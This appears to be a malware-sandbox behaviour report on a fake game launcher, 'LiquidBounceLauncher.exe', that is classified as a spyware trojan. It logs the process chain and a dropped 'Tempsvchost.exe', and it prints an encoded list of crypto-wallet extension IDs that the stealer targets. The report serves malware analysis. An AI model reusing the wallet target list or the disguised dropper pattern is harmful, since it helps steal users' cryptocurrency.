                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 660
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Tempsvchost.exe "C:\Users\user\AppData\Local\Tempsvchost.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D03.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/10@1/3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: 0.3.LiquidBounceLauncher.exe.7b0000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: 4.2.AppLaunch.exe.400000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6588
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3368
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: LiquidBounceLauncher.exeStatic file information: File size 1156040 > 1048576
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0046E470 push eax; mov dword ptr [esp], ebx0_2_0046E98B
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004815E0 push eax; mov dword ptr [esp], ebx0_2_00481960
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004806D0 push eax; mov dword ptr [esp], ebx0_2_00480940
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0047D840 push eax; mov dword ptr [esp], ebx0_2_0047D976
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0046E9A0 push eax; mov dword ptr [esp], ebx0_2_0046EEBB
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00481090 push eax; mov dword ptr [esp], ebx17_2_00481410
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00480180 push eax; mov dword ptr [esp], ebx17_2_004803F0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0047D2F0 push eax; mov dword ptr [esp], ebx17_2_0047D426
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0046E450 push eax; mov dword ptr [esp], ebx17_2_0046E96B
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0047D540 push eax; mov dword ptr [esp], ebx17_2_0047D676
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004816E0 push eax; mov dword ptr [esp], ebx17_2_00481A60
                      Source: LiquidBounceLauncher.exeStatic PE information: section name: .eh_fram
                      Source: Tempsvchost.exe.4.drStatic PE information: section name: .eh_fram
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_00401340 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,atexit,0_2_00401340
                      Source: LiquidBounceLauncher.exeStatic PE information: real checksum: 0x119a4f should be: 0x125029
                      Source: Tempsvchost.exe.4.drStatic PE information: real checksum: 0x1cc809 should be: 0x1d85ee
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Tempsvchost.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
